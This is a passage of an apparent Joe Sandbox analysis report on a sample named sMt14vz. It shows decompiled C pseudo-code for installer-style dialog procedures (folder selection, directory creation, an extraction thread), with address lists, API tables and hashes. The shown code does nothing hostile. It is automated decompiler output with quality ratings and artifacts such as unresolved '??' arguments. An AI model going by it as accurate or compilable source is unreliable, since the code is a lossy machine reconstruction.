                                                                                                                                                                                                                                            					if( *_t44 == 0x5c &&  *(CharPrevA(0x10d88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                            						 *_v8 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x010d4234
                                                                                                                                                                                                                                            0x010d423c
                                                                                                                                                                                                                                            0x010d4240
                                                                                                                                                                                                                                            0x010d43b2
                                                                                                                                                                                                                                            0x010d43b7
                                                                                                                                                                                                                                            0x010d43c0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d43c5
                                                                                                                                                                                                                                            0x010d424c
                                                                                                                                                                                                                                            0x010d4252
                                                                                                                                                                                                                                            0x010d4257
                                                                                                                                                                                                                                            0x010d43a4
                                                                                                                                                                                                                                            0x010d43a5
                                                                                                                                                                                                                                            0x010d43ab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d43ab
                                                                                                                                                                                                                                            0x010d4263
                                                                                                                                                                                                                                            0x010d4269
                                                                                                                                                                                                                                            0x010d426e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d427a
                                                                                                                                                                                                                                            0x010d4280
                                                                                                                                                                                                                                            0x010d4285
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d428d
                                                                                                                                                                                                                                            0x010d4293
                                                                                                                                                                                                                                            0x010d42e6
                                                                                                                                                                                                                                            0x010d42e9
                                                                                                                                                                                                                                            0x010d42ef
                                                                                                                                                                                                                                            0x010d42f4
                                                                                                                                                                                                                                            0x010d42f7
                                                                                                                                                                                                                                            0x010d4300
                                                                                                                                                                                                                                            0x010d4307
                                                                                                                                                                                                                                            0x010d430e
                                                                                                                                                                                                                                            0x010d4315
                                                                                                                                                                                                                                            0x010d431c
                                                                                                                                                                                                                                            0x010d4322
                                                                                                                                                                                                                                            0x010d4326
                                                                                                                                                                                                                                            0x010d432d
                                                                                                                                                                                                                                            0x010d432d
                                                                                                                                                                                                                                            0x010d432f
                                                                                                                                                                                                                                            0x010d4334
                                                                                                                                                                                                                                            0x010d4343
                                                                                                                                                                                                                                            0x010d4349
                                                                                                                                                                                                                                            0x010d434d
                                                                                                                                                                                                                                            0x010d4354
                                                                                                                                                                                                                                            0x010d4354
                                                                                                                                                                                                                                            0x010d435d
                                                                                                                                                                                                                                            0x010d436e
                                                                                                                                                                                                                                            0x010d436e
                                                                                                                                                                                                                                            0x010d437d
                                                                                                                                                                                                                                            0x010d4383
                                                                                                                                                                                                                                            0x010d4387
                                                                                                                                                                                                                                            0x010d438e
                                                                                                                                                                                                                                            0x010d438e
                                                                                                                                                                                                                                            0x010d4387
                                                                                                                                                                                                                                            0x010d4391
                                                                                                                                                                                                                                            0x010d4399
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4295
                                                                                                                                                                                                                                            0x010d429f
                                                                                                                                                                                                                                            0x010d42a5
                                                                                                                                                                                                                                            0x010d42aa
                                                                                                                                                                                                                                            0x010d42aa
                                                                                                                                                                                                                                            0x010d42ad
                                                                                                                                                                                                                                            0x010d42ad
                                                                                                                                                                                                                                            0x010d42af
                                                                                                                                                                                                                                            0x010d42b0
                                                                                                                                                                                                                                            0x010d42b6
                                                                                                                                                                                                                                            0x010d42c2
                                                                                                                                                                                                                                            0x010d42c8
                                                                                                                                                                                                                                            0x010d42ce
                                                                                                                                                                                                                                            0x010d42e4
                                                                                                                                                                                                                                            0x010d42e4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d42ce

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 010D4236
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 010D424C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 010D4263
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 010D427A
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,010D88C0,?,00000001), ref: 010D429F
                                                                                                                                                                                                                                            • CharPrevA.USER32(010D88C0,021B1181,?,00000001), ref: 010D42C2
                                                                                                                                                                                                                                            • CharPrevA.USER32(010D88C0,00000000,?,00000001), ref: 010D42D6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010D4391
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010D43A5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                            • Opcode ID: e53ed14191c456ed277d982ba861dde10ca10329ffd741199efddac26fc228a9
                                                                                                                                                                                                                                            • Instruction ID: 248a21b21e9344f94b954a62521cb2cc0a0476c9b1b64f9f70d58a362f4d2f6d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e53ed14191c456ed277d982ba861dde10ca10329ffd741199efddac26fc228a9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B241E974A01354EFE721AF79E8859BE7FB4EB45344F0481AAEDC1E7245CB798901CB60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E010D3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				char _t23;
                                                                                                                                                                                                                                            				char _t24;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				CHAR* _t49;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				char* _t59;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t64;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                                                                                                            				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                            					EndDialog(_t64, ??);
                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 = 1;
                                                                                                                                                                                                                                            				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                            				if(_t10 == 0) {
                                                                                                                                                                                                                                            					E010D43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                            					SetWindowTextA(_t64, 0x10d9154);
                                                                                                                                                                                                                                            					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                            					if( *0x10d9a40 == _t42) {
                                                                                                                                                                                                                                            						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L36:
                                                                                                                                                                                                                                            					return _t42;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t10 == _t42) {
                                                                                                                                                                                                                                            					_t20 = _a12 - 1;
                                                                                                                                                                                                                                            					if(_t20 == 0) {
                                                                                                                                                                                                                                            						if(GetDlgItemTextA(_t64, 0x835, 0x10d91e4, 0x104) == 0) {
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							_t58 = 0x4bf;
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							E010D44B9(_t64, _t58);
                                                                                                                                                                                                                                            							goto L39;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t49 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t4 =  &(_t49[1]); // 0x10d91e5
                                                                                                                                                                                                                                            						_t59 = _t4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t23 =  *_t49;
                                                                                                                                                                                                                                            							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                            						} while (_t23 != 0);
                                                                                                                                                                                                                                            						if(_t49 - _t59 < 3) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 =  *0x10d91e5;
                                                                                                                                                                                                                                            						if(_t24 == 0x3a ||  *0x10d91e4 == 0x5c && _t24 == 0x5c) {
                                                                                                                                                                                                                                            							if(GetFileAttributesA(0x10d91e4) != 0xffffffff) {
                                                                                                                                                                                                                                            								L26:
                                                                                                                                                                                                                                            								E010D658A(0x10d91e4, 0x104, 0x10d1140);
                                                                                                                                                                                                                                            								if(E010D58C8(0x10d91e4) != 0) {
                                                                                                                                                                                                                                            									if( *0x10d91e4 != 0x5c ||  *0x10d91e5 != 0x5c) {
                                                                                                                                                                                                                                            										if(E010D597D(0x10d91e4, 1, _t64, 1) == 0) {
                                                                                                                                                                                                                                            											L35:
                                                                                                                                                                                                                                            											_t42 = 1;
                                                                                                                                                                                                                                            											goto L36;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t42 = 1;
                                                                                                                                                                                                                                            										EndDialog(_t64, 1);
                                                                                                                                                                                                                                            										goto L36;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t58 = 0x4be;
                                                                                                                                                                                                                                            								goto L25;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(E010D44B9(_t64, 0x54a, 0x10d91e4, 0, 0x20, 4) != 6) {
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(CreateDirectoryA(0x10d91e4, 0) != 0) {
                                                                                                                                                                                                                                            								goto L26;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10d91e4);
                                                                                                                                                                                                                                            							_t58 = 0x4cb;
                                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t34 = _t20 - 1;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						EndDialog(_t64, 0);
                                                                                                                                                                                                                                            						 *0x10d9124 = 0x800704c7;
                                                                                                                                                                                                                                            						goto L39;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t34 != 0x834) {
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(LoadStringA( *0x10d9a3c, 0x3e8, 0x10d8598, 0x200) != 0) {
                                                                                                                                                                                                                                            						if(E010D4224(_t64, _t46, _t46) == 0 || SetDlgItemTextA(_t64, 0x835, 0x10d87a0) != 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t63 = 0x4c0;
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							E010D44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							goto L38;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = 0x4b1;
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x010d321b
                                                                                                                                                                                                                                            0x010d321e
                                                                                                                                                                                                                                            0x010d3221
                                                                                                                                                                                                                                            0x010d343c
                                                                                                                                                                                                                                            0x010d343e
                                                                                                                                                                                                                                            0x010d343f
                                                                                                                                                                                                                                            0x010d3445
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3447
                                                                                                                                                                                                                                            0x010d3229
                                                                                                                                                                                                                                            0x010d322a
                                                                                                                                                                                                                                            0x010d322f
                                                                                                                                                                                                                                            0x010d33ec
                                                                                                                                                                                                                                            0x010d33f7
                                                                                                                                                                                                                                            0x010d3410
                                                                                                                                                                                                                                            0x010d341d
                                                                                                                                                                                                                                            0x010d342d
                                                                                                                                                                                                                                            0x010d342d
                                                                                                                                                                                                                                            0x010d3438
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3438
                                                                                                                                                                                                                                            0x010d3237
                                                                                                                                                                                                                                            0x010d3243
                                                                                                                                                                                                                                            0x010d3246
                                                                                                                                                                                                                                            0x010d32f6
                                                                                                                                                                                                                                            0x010d33d4
                                                                                                                                                                                                                                            0x010d33d6
                                                                                                                                                                                                                                            0x010d33db
                                                                                                                                                                                                                                            0x010d33dc
                                                                                                                                                                                                                                            0x010d33de
                                                                                                                                                                                                                                            0x010d33df
                                                                                                                                                                                                                                            0x010d3370
                                                                                                                                                                                                                                            0x010d3372
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3372
                                                                                                                                                                                                                                            0x010d32fc
                                                                                                                                                                                                                                            0x010d32fe
                                                                                                                                                                                                                                            0x010d32fe
                                                                                                                                                                                                                                            0x010d3301
                                                                                                                                                                                                                                            0x010d3301
                                                                                                                                                                                                                                            0x010d3303
                                                                                                                                                                                                                                            0x010d3304
                                                                                                                                                                                                                                            0x010d330d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3313
                                                                                                                                                                                                                                            0x010d331a
                                                                                                                                                                                                                                            0x010d333d
                                                                                                                                                                                                                                            0x010d337c
                                                                                                                                                                                                                                            0x010d3388
                                                                                                                                                                                                                                            0x010d3396
                                                                                                                                                                                                                                            0x010d33ab
                                                                                                                                                                                                                                            0x010d33c5
                                                                                                                                                                                                                                            0x010d3435
                                                                                                                                                                                                                                            0x010d3437
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3437
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d33c7
                                                                                                                                                                                                                                            0x010d33c7
                                                                                                                                                                                                                                            0x010d33c9
                                                                                                                                                                                                                                            0x010d33cc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d33cc
                                                                                                                                                                                                                                            0x010d33ab
                                                                                                                                                                                                                                            0x010d3398
                                                                                                                                                                                                                                            0x010d3399
                                                                                                                                                                                                                                            0x010d339b
                                                                                                                                                                                                                                            0x010d339c
                                                                                                                                                                                                                                            0x010d339d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d339d
                                                                                                                                                                                                                                            0x010d3354
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3364
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3366
                                                                                                                                                                                                                                            0x010d3367
                                                                                                                                                                                                                                            0x010d3369
                                                                                                                                                                                                                                            0x010d336a
                                                                                                                                                                                                                                            0x010d336b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d331a
                                                                                                                                                                                                                                            0x010d324c
                                                                                                                                                                                                                                            0x010d324f
                                                                                                                                                                                                                                            0x010d32c8
                                                                                                                                                                                                                                            0x010d32ce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d32ce
                                                                                                                                                                                                                                            0x010d3256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3279
                                                                                                                                                                                                                                            0x010d329f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d32be
                                                                                                                                                                                                                                            0x010d32be
                                                                                                                                                                                                                                            0x010d3280
                                                                                                                                                                                                                                            0x010d3289
                                                                                                                                                                                                                                            0x010d328e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d328e
                                                                                                                                                                                                                                            0x010d329f
                                                                                                                                                                                                                                            0x010d327b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d327b
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000003E8,010D8598,00000200), ref: 010D3271
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 010D33E2
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,010D9154), ref: 010D33F7
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 010D3410
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000836), ref: 010D3426
                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 010D342D
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 010D343F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2418873061-0
                                                                                                                                                                                                                                            • Opcode ID: 4dac7e142efa71f99b6906d00a97c6df715d6b6ee929a163218919be01644728
                                                                                                                                                                                                                                            • Instruction ID: 5e6686feb51dd231202e50faf35146d2fa475f071fb5aaf76a044f0955abef9a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4dac7e142efa71f99b6906d00a97c6df715d6b6ee929a163218919be01644728
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 595107B4382351B6EB725A799C4CFBF2D99FB46B54F008028FAC59E1C5CEAD9401C362
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                                                                            			E010D34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t35;
                                                                                                                                                                                                                                            				struct HWND__* _t38;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t9 == 0) {
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					 *0x10d91d8 = 1;
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                            					L21:
                                                                                                                                                                                                                                            					EndDialog();
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				_pop(1);
                                                                                                                                                                                                                                            				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                            				if(_t12 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                            					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t35 = _a4;
                                                                                                                                                                                                                                            					 *0x10d8584 = _t35;
                                                                                                                                                                                                                                            					E010D43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                            					__eflags =  *0x10d8184; // 0x1
                                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetWindowTextA(_t35, 0x10d9154);
                                                                                                                                                                                                                                            					_t17 = CreateThread(0, 0, E010D4FE0, 0, 0, 0x10d8798);
                                                                                                                                                                                                                                            					 *0x10d879c = _t17;
                                                                                                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						E010D44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t35);
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t23 = _t13 - 1;
                                                                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 2;
                                                                                                                                                                                                                                            					if(_a12 != 2) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					ResetEvent( *0x10d858c);
                                                                                                                                                                                                                                            					_t38 =  *0x10d8584; // 0x0
                                                                                                                                                                                                                                            					_t25 = E010D44B9(_t38, 0x4b2, 0x10d1140, 0, 0x20, 4);
                                                                                                                                                                                                                                            					__eflags = _t25 - 6;
                                                                                                                                                                                                                                            					if(_t25 == 6) {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						 *0x10d91d8 = 1;
                                                                                                                                                                                                                                            						SetEvent( *0x10d858c);
                                                                                                                                                                                                                                            						_t39 =  *0x10d879c; // 0x0
                                                                                                                                                                                                                                            						E010D3680(_t39);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t25 - 1;
                                                                                                                                                                                                                                            					if(_t25 == 1) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetEvent( *0x10d858c);
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                            					TerminateThread( *0x10d879c, 0);
                                                                                                                                                                                                                                            					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x010d34fb
                                                                                                                                                                                                                                            0x010d34fe
                                                                                                                                                                                                                                            0x010d3665
                                                                                                                                                                                                                                            0x010d3666
                                                                                                                                                                                                                                            0x010d3666
                                                                                                                                                                                                                                            0x010d3668
                                                                                                                                                                                                                                            0x010d366e
                                                                                                                                                                                                                                            0x010d366e
                                                                                                                                                                                                                                            0x010d3671
                                                                                                                                                                                                                                            0x010d3671
                                                                                                                                                                                                                                            0x010d3677
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3677
                                                                                                                                                                                                                                            0x010d3504
                                                                                                                                                                                                                                            0x010d3506
                                                                                                                                                                                                                                            0x010d3507
                                                                                                                                                                                                                                            0x010d350c
                                                                                                                                                                                                                                            0x010d365b
                                                                                                                                                                                                                                            0x010d365f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3661
                                                                                                                                                                                                                                            0x010d3512
                                                                                                                                                                                                                                            0x010d3515
                                                                                                                                                                                                                                            0x010d35be
                                                                                                                                                                                                                                            0x010d35c1
                                                                                                                                                                                                                                            0x010d35d1
                                                                                                                                                                                                                                            0x010d35d8
                                                                                                                                                                                                                                            0x010d35de
                                                                                                                                                                                                                                            0x010d35f8
                                                                                                                                                                                                                                            0x010d3617
                                                                                                                                                                                                                                            0x010d3617
                                                                                                                                                                                                                                            0x010d3623
                                                                                                                                                                                                                                            0x010d3637
                                                                                                                                                                                                                                            0x010d363d
                                                                                                                                                                                                                                            0x010d3642
                                                                                                                                                                                                                                            0x010d3644
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3646
                                                                                                                                                                                                                                            0x010d3652
                                                                                                                                                                                                                                            0x010d3657
                                                                                                                                                                                                                                            0x010d3658
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3658
                                                                                                                                                                                                                                            0x010d3644
                                                                                                                                                                                                                                            0x010d351b
                                                                                                                                                                                                                                            0x010d351d
                                                                                                                                                                                                                                            0x010d354f
                                                                                                                                                                                                                                            0x010d3553
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d355f
                                                                                                                                                                                                                                            0x010d3565
                                                                                                                                                                                                                                            0x010d357c
                                                                                                                                                                                                                                            0x010d3581
                                                                                                                                                                                                                                            0x010d3584
                                                                                                                                                                                                                                            0x010d359b
                                                                                                                                                                                                                                            0x010d35a1
                                                                                                                                                                                                                                            0x010d35a7
                                                                                                                                                                                                                                            0x010d35ad
                                                                                                                                                                                                                                            0x010d35b3
                                                                                                                                                                                                                                            0x010d35b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d35b8
                                                                                                                                                                                                                                            0x010d3586
                                                                                                                                                                                                                                            0x010d3588
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3590
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3590
                                                                                                                                                                                                                                            0x010d3524
                                                                                                                                                                                                                                            0x010d3535
                                                                                                                                                                                                                                            0x010d3541
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3549
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 010D3535
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 010D3541
                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 010D355F
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(010D1140,00000000,00000020,00000004), ref: 010D3590
